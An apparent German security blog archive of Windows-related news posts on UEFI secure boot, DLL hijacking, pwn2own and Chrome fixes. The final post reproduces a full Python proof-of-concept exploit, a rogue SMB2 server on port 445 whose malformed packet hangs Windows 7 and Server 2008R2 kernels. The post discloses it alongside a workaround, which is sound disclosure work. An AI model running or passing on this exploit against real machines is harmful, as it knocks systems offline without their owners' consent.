Archiv

Artikel Tagged ‘windows’

Windows8, UEFI und das Linuxbootverbot

21. September 2011 4 Kommentare

Microsoft ist nun wohl wieder auf der Jagd, Opfer wie immer freie Betriebssystem und hier wurde eine Hintertuer aufgestossen die Linux und Co nun Probleme bereiten koennten, das ganze nennt sich UEFI das „secure boot protocol“. UEFI erfordert für die am Bootprozess beteiligte Software und Firmware Zertifizierungen durch eine Certificate Authority und Rechner die in Zukunft das Windows8 Logo tragen wollen, muessen hiermit ausgeruestet sein.
Aufgefallen ist die neue Anforderung Matthew Garrett wobei dieser klar erlaeutert, das Problem sei weniger die UEFI ansich, sondern die Zertifizierung als solche, denn die passenden Schluessel kommen von Microsoft. Mehr…

DLL Hijacking unter Windows, Exploitwelle nimmt nicht ab

26. August 2010 Keine Kommentare

Am Montag bestaetigte Microsoft eine gravierende Sicherheitsluecke in diversen Windowsprogrammen, ein Verfahren das DLL Hijacking genannt wird erlaubt es entfernten Angreifern Windowssystemen Malware unterzuschieben via Besuch auf einer Webseite, Shares, Lokal via USB Stick etc.
Soweit vielleicht nichts neues, jedoch ist die zuerst nicht als all zu kritisch bezeichnete Luecke groesser als gedacht und es gibt mitlerweile ueber 40 Exploits fuer alle Denkbaren Programme von IE ueber Firefox zu Chrome, Photoshop etc.
Eine ware Exploitwelle macht sich breit und generell sollte man nun ein Windowssystem generell lieber abgeschalten lassen, denn laut Microsoft laesst sich diese Luecke nicht ohne weiteres beheben und der Redmonder Konzern steht nun vor einem echte Problem.
Einen Workaround haben die Redmonder jedoch bereitgestellt und dieser sollte unbedingt genutzt werden bis es einen wirklich Fix gibt fuer gegen das Problem: KB 2264107

Update: Topicfix s/DDL/DLL/ danke an Knorke!

pwn2own owned einmal mehr, Chrome bleibt standhaft

25. März 2010 Keine Kommentare

Wie schon in den Jahren zuvor ist Pwn2Own auf der CanSecWest wieder ein schoenes Spektakel und es gibt auch schon wieder die ersten Opfer und wen wundert es das natuerlich ganz vorne wieder Apple Produkte lagen, leider ist mir nicht bekannt ob diese wie erwartet auch als erste gefallen sind.
Gehackt wurden Safari, IE7, Firefox und auch das Apple IPhone ist den Hacker unterlegen und auf allen Systemen konnte Code eingeschleust und ausgefuehrt werden.
Pwn2own-Veteran Charlie Miller bekommt erneut ein MacBook Pro ein, indem er eine seiner gesammelten 0day-Lücken in Apples Safari opferte, er scheint hier noch ein paar mehr auf Lager zu haben.
Das IPhone wurde von Iozzo und Weinmann via praeperierter Webseite dazu gebracht seine SMS Datenbank auszugeben und auch hier wurde Code eingeschleust und an Apples Sicherheitsfeatures vorbeigeschleust.
Peter Vreugdenhil gelang es, den Internet Explorer 8 auf Windows 7 zu hacken, an den Features ASLR und DEP vorbei.

Schoen zu hoeren das niemand sich an Chrome gewagt hat, wobei gewagt hat sicherlich der falsch Ausdruck ist, hier konnten wohl keine Luecken gefunden werden in der Vorbereitung und daher wurde Chrome in Ruhe gelassen.

Die Show geht nun weiter mit gelockerten Regeln und wir koennen immer noch gespannt sein was hier passiert.

(Quelle: CanSecWest)

pwn2own Runde 4

17. Februar 2010 Keine Kommentare

TippingPoint Zero Day Initiative kuendigt die 4. Runde des pwn2own Contests an, wie auch in den vergangenen Jahren findet der Contest auf der CanSecWest Security Conference, welche in Vancouver abgehalten wird, statt.
Beginn der Veranstaltung ist der 24/03/2010.

Erneut werden Hacker dazu aufgefordert Sicherheitsluecken in diversen Produkten zu finden und bei einem erfolgreichen Hack, welcher zur Ausfuehrung von fremden Code ohne oder nur mit minimaler Userinteraktion fuehrt, mit Preisgeldern von gesamt 100.000 USD belohnt.
Die Regeln sind recht einfach, dem Hack muss ein Zero Day Exploit zu Grunde liegen, Code ausfuehren, der schnellste Hacker gewinnt.
Auch dieses Jahr wieder werden die 2 Haupttechnologien Browser und Smartphones sein.
So werden am ersten Tag Internet Explorer, Chrome, Firefox auf Windows7 sowie Safari auf dem Mac als „Opfer“ zur Verfuegung stehen.
Die 2. Runde geht an nicht gehackte Browser und diese werden dann auf einem Windos Vista zur Verfuegung stehen.
Weiter geht es mit den Mobiltelefonen Apple iPhone 3GS, RIM Blackberry Bold 9700, Nokia Geraet mit Symbian S60 (evtl E62) und ein Motorola mit Android.
Pwn2Own wird wieder an 3 Tagen abgehalten werden und neben Geldpreisen winken auch immer die Geraete auf denen die Hacks durchgefuehrt wurden, wie die Notebooks auf denen die Browser arbeiten, die dem Pwn2Own Hacker zum Opfer fallen.

Persoenlich wette ich das wieder einmal Crapples Safari der erste sein wird der faellt.

(Quelle: pwn2own)

Google Chrome 4.0 schliesst Sicherheitsluecken

27. Januar 2010 Keine Kommentare

Google hat heute seinen Browser Chrome in der Version 4.0 veroeffentlicht, Anwendern wird dringend geraten die neue Version zu installieren, da in diesem neben einigen neuen Features und Sicherheitstechniken unter anderem 13 Sicherheitsluecken gefixed wurden von denen das Team rund um Chrome 4 als kritisch einstuft.
Diese koennten dazu genutzt werden Windowspcs zu kompromittieren und/oder Schadsoftware einzuschleusen.
Eines der interssantesten Features ein experimenteller Cross Site Scripting Schutz namens XSS Auditor mit. Der Filter checkt, ob ein JavaScript bereits in dem Request enthalten war, das beim Aufbau einer verwundbare Webseite nun zurueckgeliefert wird.
Wenn ja, handelt es sich sehr wahrscheinlich um eine sogenannte reflektive XSS-Attacke, bei dem ein Angreifer einen Link manipuliert hat – der Browser führt das Skript dann nicht aus.

Windows 7, Server 2008R2 Remote Kernel Crash

11. November 2009 Keine Kommentare

Laurent Gaffié meldete ein Sicherheitsproblem an Microsoft, jedoch wendete sich MS an den Autor und versuchte diesem zu verstehen zu geben, dass ein „multi-vendor-ipv6 bug“ nicht in einem Security Bulletin richtig aufgehoben ist.
Laurent released daher folgenden PoC (von mir nicht getestet):

–>
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()
# caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly
#crash
#Author: Laurent Gaffié

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port
445
launch.serve_forever()

#SDL FAILED
<-- Als Workaround wird empfohlen Samba Features und Ports zu schliessen. (Quelle: Laurents Blog)